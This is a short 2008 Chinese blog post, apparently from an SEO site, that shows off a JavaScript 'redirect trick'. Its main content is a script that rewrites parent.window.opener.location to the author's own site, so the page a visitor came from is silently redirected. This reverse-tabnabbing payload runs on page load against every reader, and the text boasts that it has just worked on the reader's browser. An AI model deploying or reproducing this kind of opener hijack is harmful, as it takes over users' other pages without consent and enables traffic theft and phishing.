很有意思的JS跳转
作者:yafan99 日期:2008-10-11
<script language=javascript>
function myload(){
Layer1_MigMoveRight.style.visibility='visible';
Layer1_MigMoveRight.style.top=document.body.scrollTop+imgheight_close;
Layer1_MigMoveRight.style.left=document.body.offsetWidth-120;
mymove();
}
function mymove(){
Layer1_MigMoveRight.style.top=document.body.scrollTop+imgheight_close;
Layer1_MigMoveRight.style.left=document.body.scrollLeft+document.body.offsetWidth-131;
setTimeout("mymove();",50);
}
function RightImgMoveClose(){
Layer1_MigMoveRight.style.visibility='hidden';
}
var imgheight_close=130;
myload();
</script>
<SCRIPT>
if(parent.window.opener) parent.window.opener.location='http://www.seo56.net/'; </SCRIPT>
看看你的浏览器页面是不是有了什么变化?
点击过来的或者其他的页面立即跳转到我的网站了吧。 :-)
上一篇
下一篇

文章来自:
相关日志: